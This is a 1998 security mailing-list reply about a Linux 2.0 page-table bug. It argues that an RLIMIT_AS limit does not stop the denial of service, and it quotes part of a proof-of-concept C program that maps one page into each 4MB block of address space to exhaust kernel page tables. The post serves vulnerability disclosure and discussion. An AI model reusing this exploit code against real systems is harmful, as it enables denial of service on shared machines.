Re: linux 2.0 PTE bug

[peak () kerberos troja mff cuni cz (Pavel Kankovsky)]

On Tue, 26 May 1998 pedward () WEBCOM COM wrote:

> (it really has nothing to do with resources).  The main factor is RLIMIT_AS,
> defined in /usr/src/linux/include/asm/resource.h, it controls how much virtual
> memory that a process can map, mmap utilizes virtual memory.  You can
> safely throttle people by running a program which calls setrlimit(2) with
> RLIMIT_AS as the resource.  By far, 3GB is too much.
>
> This is only a DoS if you LET it be a DoS.

No. Re-read the program carefully:

<quote author="p6mip300 () INFOP6 CICRP JUSSIEU FR">

void the_handler(int x)
{
  signal(SIGSEGV, the_handler);

  touch_me++;

  if(mmap((void *)address, 4, PROT_READ,
        MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
    perror("mmap");
    exit(1);
  }
}

void main(void)
{
[...]
  signal(SIGSEGV, the_handler);

  /* 3*1024*1024*1024 = TASK_SIZE,
   * 1024*4096 = number of bytes one pte can map */
  for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
    i=*(unsigned long *)address;
    if (touch_me) {
      touch_me=0;
      munmap((void *)address, 4);
    }
  }
[...]
}

</quote>

The program allocates ONE page for each 4MB block of address space. This
makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if
it did not disallocate the page having touched it.

It can run with RLIMIT_AS set to 1MB. At least on my system--I have
tried it (according to /proc/*/status, VmSize was 904 kB).


--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]